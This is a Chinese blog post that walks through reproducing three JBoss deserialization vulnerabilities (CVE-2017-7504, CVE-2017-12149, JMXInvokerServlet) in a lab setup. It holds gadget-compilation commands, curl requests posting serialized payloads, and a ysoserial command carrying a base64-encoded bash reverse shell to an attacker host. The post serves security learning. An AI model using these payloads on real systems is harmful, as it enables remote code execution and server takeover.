【jboss漏洞复现】CVE-2017-7504反序列化漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization反序列化漏洞

最新推荐文章于 2023-08-24 12:29:27 发布
最新推荐文章于 2023-08-24 12:29:27 发布
阅读量939 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120009951
版权


CVE-2017-7504

Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation LayerHTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

1.扫描开放了8080端口,访问8080端口:

2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列化数据:

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

3.执行创建一个文件的命令:执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.ser

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"

4.将该文件作为body发送如下数据包:

curl http://192.168.225.139:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

7.在靶机的/tmp/success目录下查看是否创建成功,成功即漏洞成功利用。

8.如何反弹shell:

在kali机上先编译生成序列化数据:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

9.执行反弹shell的命令:

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.225.133:1234

双引号内是我们要执行的命令,我用bash反弹一个shell到kali,这条命令会在当前目录下生成一个ExampleCommonsCollections1WithHashMap.ser文件

11.kali下执行:

curl http://192.168.225.139:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

12.nc监听1234端口,成功反弹:

有一个非常方便的使用工具:7504和12149两个漏洞都可以使用:

CVE-2017-12149

该漏洞位于JBossHttpInvoker组件中的ReadOnlyAccessFilter过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。

但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。

1.访问链接:

http://192.168.225.139:8080/invoker/readonly

可以看到是返回500,一般漏洞就是存在了。

2.如何反弹shell:

1.使用工具,老方法,先编译后写入反弹shell进行监听:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.225.133:1234

curl http://192.168.225.139:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

2.成功反弹:

JMXInvokerServlet-deserialization

1.和前面的一样,先访问以下网址,只要有文件下载,目标网站即存在JBoss JMXInvokerServlet反序列化漏洞

http://192.168.225.139:8080/invoker/JMXInvokerServlet

2.因为JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象,所以我们直接将ysoserial生成好的POC附在POST Body中发送即可。

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xMzMvMzMzMyAwPiYx}|{base64,-d}|{bash,-i} " >exp.ser

3.通过二进制poc将其传入到靶机:

curl http://192.168.225.139:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

4.成功反弹shell:

malloc_冲!
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
weixin_54626591的博客
05-06 114
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3888
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
jboss漏洞复现
Shanfenglan's blog
11-23 998
文章目录什么是jboss1. JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)原理利用2. JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)原理利用参考文章 什么是jboss java中间件,类似于weblogic,webSphere等。可以理解成是一个加强版的可以实现EJB的tomcat。它的内部集成了tomcat对servlet处理的功能,而且支持EJB,不过weblogic的性能几乎全优于它,基本可以用weblogic代替。 1. JBos
CVE-2017-7504 (JBOSS反序列化漏洞)漏洞复现
Jerry____的博客
12-16 1889
CVE-2017-7504 (JBOSS反序列化漏洞)漏洞复现 一:漏洞原理 JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二:影响范围 JBoss AS 4.x及之前版本。 三:环境搭建 cd...
Jboss CVE-2017-12149 漏洞复现(vulhub)
最新发布
MDSEC的博客
08-24 273
CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码
利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
qq_50854662的博客
09-17 351
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程漏洞原理 复现过程启动环境端口设置浏览器设置BurpSuit设置 复现漏洞序列化数据生成发送POCEXP Vulnhub官方复现教程 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ 漏洞原理 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvo..
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 反序列化漏洞详解及反弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反...
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149Jboss反序列化漏洞利用工具,CVE-2017-12149
jboss4版本修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439)升级包
04-25
jboss4版本下,jbossweb-tomcat55.sar升级包,修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439) 升级包中的jar来源于tomcat5.5.36 使用方法:直接替换jboss中旧的jbossweb-tomcat55.sar
中间件安全之JBoss
qq_46085232的博客
05-12 252
中间件安全JBoss特定漏洞JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504JMXInvokerServlet 反序列化漏洞弱口令安全JBoos 4.X 弱口令管理后台部署war包getshellJBoos 5/6.X 弱口令管理后台部署war包getshell危害 JBoss JBoss 是一个基于 J2EE 的开发源代码的应用服务器。 JBoss 代码遵循 LGPL 许可,可以在任何商业应用中免
jboss --- 漏洞复现ysoserial工具
代码审计
04-27 1232
这里写目录标题 ssh 代理转发 访问物理机中的3388端口 就相当于访问虚拟机bihuo java中的 3389端口
[ vulhub漏洞复现篇 ] Jboss_JMXInvokerServlet_Deserialization反序列化代码执行漏洞
qq_51577576的博客
09-15 1073
Jboss_JMXInvokerServlet_Deserialization代码执行漏洞漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
【vulhub】JMXInvokerServlet-deserialization JBOOS 反序列化漏洞
weixin_42884199的博客
12-09 2365
前言 影响版本 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Data V
JBoss JMXInvokerServlet 反序列化漏洞复现
W小哥
05-26 1789
一、漏洞描述 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6.2.0 JBoss SOA Platform (SOA-P) 5.3.1 JBoss Data Grid (JDG) 6.5.0 JBoss BRMS (BRMS) 6.1.0 JBoss BPMS (BPMS) 6.1.0 JBoss Da
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501)
黑白的博客
12-21 2024
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
CVE-2017-12149漏洞分析
05-30
CVE-2017-12149JBOSS应用服务器中的一个远程代码执行漏洞JBOSS是一款Java EE应用服务器,该漏洞允许攻击者通过HTTP请求发送恶意的序列化对象,从而在目标服务器上执行任意代码。 这个漏洞的原因在于JBOSS中的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值